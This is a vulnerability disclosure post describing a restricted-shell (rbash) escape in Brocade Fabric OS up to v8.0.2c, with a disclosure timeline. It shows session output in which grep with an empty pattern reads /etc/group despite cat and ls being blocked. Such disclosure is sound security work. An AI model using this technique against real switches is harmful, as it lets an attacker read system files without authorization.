Nov 29, 2022 1 min read

Brocade Fabric OS ≤ v8.0.2c rbash escape to read system files

Broadcom offers a number of products and networking solutions such as switches, extensions etc. These products come with their own operating system, i.e. the Fabric OS. It is a lightweight OS that upon logging in through ssh or telnet one is found within the restricted environment of rbash. The user is not able to execute any of the known system commands, such as ls, echo, cd, cat, etc but only some available custom commands the developers have made themselves e.g.

...
iflshow                    Display edge switch FCR connection information
interfaceshow              Display the FSPF (TM) interface information
iodset                     Manage the in-order delivery (IOD) option
iodshow                    Display the state of the in-order delivery option
ipaddrset                  Set ethernet and FC IP addresses
ipaddrshow                 Print ethernet and FC IP addresses
islshow                    Display the current connections and status
...

One of the available commands is the classic system command grep. The system also allows pipelines |, which explains the reason for them to allow the use of grep

HOSTNAME:user> ipaddrshow 
SWITCH
Ethernet IP Address: 10.115.76.184
Ethernet Subnetmask: 255.255.254.0
Gateway IP Address: 10.115.76.251
DHCP: Off

HOSTNAME:user> ipaddrshow |grep Gateway
Gateway IP Address: 10.115.76.251
HOSTNAME:user>

By leaving grep available one can read underlying system files by searching for the empty pattern ''. The files one has access to depend on the authenticated user's privileges.

HOSTNAME:user> cat /etc/group
rbash: cat: command not found
HOSTNAME:user> ls /etc/group
rbash: ls: command not found
HOSTNAME:user> grep '' /etc/group
root::0:root
sys::3:root,bin
smmsp::25:smmsp
nobody::99:
users::100:
utmp:x:102:
admin::600:admin,root
user::602:user,admin,root
switchadmin::604:
operator::605:
zoneadmin::606:
fabricadmin::607:
basicswitchadmin::608:
securityadmin::609:
udrole::550:
HOSTNAME:user>

The issue was discovered by Bitcrack during a penetration test for a client and reported it to Broadcom's PSIRT. Broadcom's internal security audit discovered it earlier this year and had scheduled a fix before Bitcrack notified them.

Timeline:

Reported to Broadcom's PSIRT: 26/9/2022
First response and redirecting us to Brocade SIRT: 26/9/2022
Second response letting us know of the found issue: 5/10/2022
Clarifications and ask for permission to post on our blog: 10/10/2022
No response from Broadcom, release of the article: 29/11/2022